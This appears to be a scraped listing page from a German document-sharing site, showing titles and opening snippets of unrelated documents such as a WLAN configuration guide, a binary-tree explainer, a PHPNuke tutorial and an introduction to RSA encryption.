Online Katalog der Bildstelle Peine: http://nds-pe.datenbank-bildungsmedien.net/ Anmeldung: Klicken Sie bitte auf ganz rechts. Tragen Sie bitte im Anmeldefeld die Daten ein, die Sie von uns erhalten haben.
MehrWLAN Konfiguration. Michael Bukreus 2014. Seite 1
WLAN Konfiguration Michael Bukreus 2014 Seite 1 Inhalt Begriffe...3 Was braucht man für PureContest...4 Netzwerkkonfiguration...5 Sicherheit...6 Beispielkonfiguration...7 Screenshots Master Accesspoint...8
MehrDAVID: und David vom Deutschlandlabor. Wir beantworten Fragen zu Deutschland und den Deutschen.
Manuskript Die Deutschen sind bekannt dafür, dass sie ihre Autos lieben. Doch wie sehr lieben sie ihre Autos wirklich, und hat wirklich jeder in Deutschland ein eigenes Auto? David und Nina fragen nach.
MehrBenutzerhandbuch - Elterliche Kontrolle
Benutzerhandbuch - Elterliche Kontrolle Verzeichnis Was ist die mymaga-startseite? 1. erste Anmeldung - Administrator 2. schnittstelle 2.1 Administrator - Hautbildschirm 2.2 Administrator - rechtes Menü
MehrWarum Sie jetzt kein Onlinemarketing brauchen! Ab wann ist Onlinemarketing. So finden Sie heraus, wann Ihre Website bereit ist optimiert zu werden
CoachingBrief 02/2016 Warum Sie jetzt kein Onlinemarketing brauchen! Eine Frage gleich zu Anfang: Wie viele Mails haben Sie in dieser Woche erhalten, in denen behauptet wurde: Inhalt Ihre Webseite sei
MehrBinäre Bäume. 1. Allgemeines. 2. Funktionsweise. 2.1 Eintragen
Binäre Bäume 1. Allgemeines Binäre Bäume werden grundsätzlich verwendet, um Zahlen der Größe nach, oder Wörter dem Alphabet nach zu sortieren. Dem einfacheren Verständnis zu Liebe werde ich mich hier besonders
MehrZukunftskonferenz. Behinderten-Sportverband Berlin e.v.
Zukunftskonferenz Behinderten-Sportverband Berlin e.v. 27.09.2008 in Berlin - Fotoprotokoll- Führungs-Akademie, DOSB: Moderation und Planung Gabriele Freytag Klaus Schirra Protokoll: Führungs-Akademie
MehrErstellen einer GoTalk-Auflage
Erstellen einer GoTalk-Auflage 1. Bei dem Startbild Vorlage öffnen wählen 2. In dem folgenden Fenster Geräte Schablonen doppelt anklicken. - und schon öffnet sich der gesamte Katalog der verfügbaren Talker-Auflagen...eigentlich
MehrErstellen eigener HTML Seiten auf ewon
ewon - Technical Note Nr. 010 Version 1.2 Erstellen eigener HTML Seiten auf ewon 30.08.2006/SI Übersicht: 1. Thema 2. Benötigte Komponenten 3. Funktionsaufbau und Konfiguration 3.1. Unterpunkt 1 3.2. Unterpunkt
MehrMigration von statischen HTML Seiten
Migration von statischen HTML Seiten Was ist Typo3 Typo3 ist ein Content Mangement System zur Generierung von Internetauftritten. Dieses System trennt Inhalt, Struktur und Layout von Dokumenten und stellt
MehrBereich METIS (Texte im Internet) Zählmarkenrecherche
Bereich METIS (Texte im Internet) Zählmarkenrecherche Über die Zählmarkenrecherche kann man nach der Eingabe des Privaten Identifikationscodes einer bestimmten Zählmarke, 1. Informationen zu dieser Zählmarke
MehrAnleitung zum Herunterladen von DIN-Vorschriften außerhalb des internen Hochschulnetzes
Anleitung zum Herunterladen von DIN-Vorschriften außerhalb des internen Hochschulnetzes Als Professor, Mitarbeiter oder Student der HTWK Leipzig ist es möglich über eine Datenbank auf verschiedene DIN-Normen
MehrWindows Explorer Das unbekannte Tool. Compi-Treff vom 19. September 2014 Thomas Sigg
Windows Explorer Das unbekannte Tool Thomas Sigg Das Wort Explorer aus dem Englischen heisst eigentlich Auskundschafter, Sucher Der Windows Explorer darf nicht mit dem Internet Explorer verwechselt werden.
MehrFuxMedia Programm im Netzwerk einrichten am Beispiel von Windows 7
FuxMedia Programm im Netzwerk einrichten am Beispiel von Windows 7 Die Installation der FuxMedia Software erfolgt erst NACH Einrichtung des Netzlaufwerks! Menüleiste einblenden, falls nicht vorhanden Die
MehrProjektmanagement in der Spieleentwicklung
Projektmanagement in der Spieleentwicklung Inhalt 1. Warum brauche ich ein Projekt-Management? 2. Die Charaktere des Projektmanagement - Mastermind - Producer - Projektleiter 3. Schnittstellen definieren
MehrWelche Bereiche gibt es auf der Internetseite vom Bundes-Aufsichtsamt für Flugsicherung?
Welche Bereiche gibt es auf der Internetseite vom Bundes-Aufsichtsamt für Flugsicherung? BAF ist die Abkürzung von Bundes-Aufsichtsamt für Flugsicherung. Auf der Internetseite gibt es 4 Haupt-Bereiche:
MehrTESTEN SIE IHR KÖNNEN UND GEWINNEN SIE!
9 TESTEN SIE IHR KÖNNEN UND GEWINNEN SIE! An den SeniorNETclub 50+ Währinger Str. 57/7 1090 Wien Und zwar gleich in doppelter Hinsicht:!"Beantworten Sie die folgenden Fragen und vertiefen Sie damit Ihr
MehrPHPNuke Quick & Dirty
PHPNuke Quick & Dirty Dieses Tutorial richtet sich an all die, die zum erstenmal an PHPNuke System aufsetzen und wirklich keine Ahnung haben wie es geht. Hier wird sehr flott, ohne grosse Umschweife dargestellt
MehrKurzanleitung der Gevopa Plattform
Kurzanleitung der Gevopa Plattform Das Hauptmenü Der Weg zu Ihrem Geld Informationen Hier werden die neuesten 5 Kreditprojekte angezeigt, sobald Sie Ihre Profildaten angegeben haben. Der Startbildschirm
MehrWas ist das Budget für Arbeit?
1 Was ist das Budget für Arbeit? Das Budget für Arbeit ist ein Persönliches Geld für Arbeit wenn Sie arbeiten möchten aber nicht mehr in einer Werkstatt. Das gibt es bisher nur in Nieder-Sachsen. Und in
MehrAccess [basics] Rechnen in Berichten. Beispieldatenbank. Datensatzweise berechnen. Berechnung im Textfeld. Reporting in Berichten Rechnen in Berichten
Berichte bieten die gleichen Möglichkeit zur Berechnung von Werten wie Formulare und noch einige mehr. Im Gegensatz zu Formularen bieten Berichte die Möglichkeit, eine laufende Summe zu bilden oder Berechnungen
MehrInfo zum Zusammenhang von Auflösung und Genauigkeit
Da es oft Nachfragen und Verständnisprobleme mit den oben genannten Begriffen gibt, möchten wir hier versuchen etwas Licht ins Dunkel zu bringen. Nehmen wir mal an, Sie haben ein Stück Wasserrohr mit der
MehrZahlenwinkel: Forscherkarte 1. alleine. Zahlenwinkel: Forschertipp 1
Zahlenwinkel: Forscherkarte 1 alleine Tipp 1 Lege die Ziffern von 1 bis 9 so in den Zahlenwinkel, dass jeder Arm des Zahlenwinkels zusammengezählt das gleiche Ergebnis ergibt! Finde möglichst viele verschiedene
MehrTeil 1: IT- und Medientechnik
Matrikelnummer Punkte Note Verwenden Sie nur dieses Klausurformular für Ihre Lösungen. Die Blätter müssen zusammengeheftet bleiben. Es dürfen keine Hilfsmittel oder Notizen in der Klausur verwendet werden
MehrRepetitionsaufgaben Wurzelgleichungen
Repetitionsaufgaben Wurzelgleichungen Inhaltsverzeichnis A) Vorbemerkungen B) Lernziele C) Theorie mit Aufgaben D) Aufgaben mit Musterlösungen 4 A) Vorbemerkungen Bitte beachten Sie: Bei Wurzelgleichungen
MehrWas meinen die Leute eigentlich mit: Grexit?
Was meinen die Leute eigentlich mit: Grexit? Grexit sind eigentlich 2 Wörter. 1. Griechenland 2. Exit Exit ist ein englisches Wort. Es bedeutet: Ausgang. Aber was haben diese 2 Sachen mit-einander zu tun?
MehrHandbuch. NAFI Online-Spezial. Kunden- / Datenverwaltung. 1. Auflage. (Stand: 24.09.2014)
Handbuch NAFI Online-Spezial 1. Auflage (Stand: 24.09.2014) Copyright 2016 by NAFI GmbH Unerlaubte Vervielfältigungen sind untersagt! Inhaltsangabe Einleitung... 3 Kundenauswahl... 3 Kunde hinzufügen...
MehrCOMPUTER MULTIMEDIA SERVICE
Umgang mit Web-Zertifikaten Was ist ein Web-Zertifikat? Alle Webseiten, welche mit https (statt http) beginnen, benötigen zwingend ein Zertifikat, welches vom Internet-Browser eingelesen wird. Ein Web
MehrVideo-Thema Manuskript & Glossar
DAS KIND ALS KONSUMENT Es gibt Forschungsinstitute, die die Wirkung von Werbung auf Kinder und Jugendliche untersuchen. Diese Zielgruppe kann 2009 insgesamt etwa 20 Milliarden Euro ausgeben. Marktforscherin
MehrInhalt. 1 Einleitung AUTOMATISCHE DATENSICHERUNG AUF EINEN CLOUDSPEICHER
AUTOMATISCHE DATENSICHERUNG AUF EINEN CLOUDSPEICHER Inhalt 1 Einleitung... 1 2 Einrichtung der Aufgabe für die automatische Sicherung... 2 2.1 Die Aufgabenplanung... 2 2.2 Der erste Testlauf... 9 3 Problembehebung...
MehrWorkflows verwalten. Tipps & Tricks
Tipps & Tricks INHALT SEITE 1. Grundlegende Informationen 3 2. Workflows / Genehmigungsprofile verwalten 2.1 Erstes Genehmigungsprofil einrichten 5 2.2 Zweites Genehmigungsprofil einrichten 11 2.3 Workflow
Mehriphone- und ipad-praxis: Kalender optimal synchronisieren
42 iphone- und ipad-praxis: Kalender optimal synchronisieren Die Synchronisierung von ios mit anderen Kalendern ist eine elementare Funktion. Die Standard-App bildet eine gute Basis, für eine optimale
MehrDatenbanken Kapitel 2
Datenbanken Kapitel 2 1 Eine existierende Datenbank öffnen Eine Datenbank, die mit Microsoft Access erschaffen wurde, kann mit dem gleichen Programm auch wieder geladen werden: Die einfachste Methode ist,
MehrGEVITAS Farben-Reaktionstest
GEVITAS Farben-Reaktionstest GEVITAS Farben-Reaktionstest Inhalt 1. Allgemeines... 1 2. Funktionsweise der Tests... 2 3. Die Ruhetaste und die Auslösetaste... 2 4. Starten der App Hauptmenü... 3 5. Auswahl
Mehr1. Einführung 2. 2. Erstellung einer Teillieferung 2. 3. Erstellung einer Teilrechnung 6
Inhalt 1. Einführung 2 2. Erstellung einer Teillieferung 2 3. Erstellung einer Teilrechnung 6 4. Erstellung einer Sammellieferung/ Mehrere Aufträge zu einem Lieferschein zusammenfassen 11 5. Besonderheiten
MehrDurchführung der Datenübernahme nach Reisekosten 2011
Durchführung der Datenübernahme nach Reisekosten 2011 1. Starten Sie QuickSteuer Deluxe 2010. Rufen Sie anschließend über den Menüpunkt /Extras/Reisekosten Rechner den QuickSteuer Deluxe 2010 Reisekosten-Rechner,
MehrKurzer Leitfaden für den Einstieg in PayComm
Kurzer Leitfaden für den Einstieg in PayComm Vor dem Login Monatliche Infomail Als Nutzer von PayComm erhalten Sie automatisch, jeweils zum Ende eines Monats, eine Informations- E-Mail direkt an Ihre E-Mail-Adresse
MehrAnleitung zum LPI ATP Portal www.lpi-training.eu
Anleitung zum LPI ATP Portal www.lpi-training.eu Version 1.0 vom 01.09.2013 Beschreibung des Anmeldevorgangs und Erklärung der einzelnen Menüpunkte. Anmeldevorgang: 1. Gehen Sie auf die Seite http://www.lpi-training.eu/.
MehrPrimzahlen und RSA-Verschlüsselung
Primzahlen und RSA-Verschlüsselung Michael Fütterer und Jonathan Zachhuber 1 Einiges zu Primzahlen Ein paar Definitionen: Wir bezeichnen mit Z die Menge der positiven und negativen ganzen Zahlen, also
MehrBürgerhilfe Florstadt
Welche Menschen kommen? Erfahrungen mit der Aufnahme vor Ort vorgestellt von Anneliese Eckhardt, BHF Florstadt Flüchtlinge sind eine heterogene Gruppe Was heißt das für Sie? Jeder Einzelne ist ein Individuum,
Mehr